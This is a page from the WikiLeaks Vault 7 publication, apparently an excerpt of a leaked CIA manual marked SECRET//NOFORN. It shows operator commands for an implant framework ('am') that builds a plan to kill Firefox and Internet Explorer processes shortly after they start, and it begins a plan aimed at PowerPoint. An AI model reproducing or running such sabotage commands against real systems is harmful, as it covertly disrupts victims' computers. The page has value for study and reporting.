Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//NOFORN
8.4 Creating Plans
Creating the plan to disallow web browsing:
$ am create plan NoBrowse # creates empty plan
$ am plan NoBrowse add Process # Adds Process gremlin to plan
# Kill every firefox.exe 30 seconds (+/- 5) after it starts
$ am plan NoBrowse config Process add -f kill -n firefox.exe -p -d 30 -j 5
0: {
"delay": 30.0,
"feature": "kill",
"frequency": 0,
"id": 0,
"instance": 0,
"jitter": 5.0,
"periodic": true,
"process_hash": 311826712,
"process_name": "firefox.exe",
"running": false
}
# Kill every new IE 30 seconds (+/- 5) after it starts
$ am plan NoBrowse config Process add -f kill -n iexplore.exe -p -d 30 -j 5
1: {
"delay": 30.0,
"feature": "kill",
"frequency": 0,
"id": 1,
"instance": 0,
"jitter": 5.0,
"periodic": true,
"process_hash": 3135833691,
"process_name": "iexplore.exe",
"running": false
}
Based on the arguments given, all firefox and iexplore processes will be killed
between 25 and 35 seconds after they appear.
Next, the anti-PowerPoint plan:
$ am create plan DeathToPowerPoint
59
SECRET//NOFORN

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh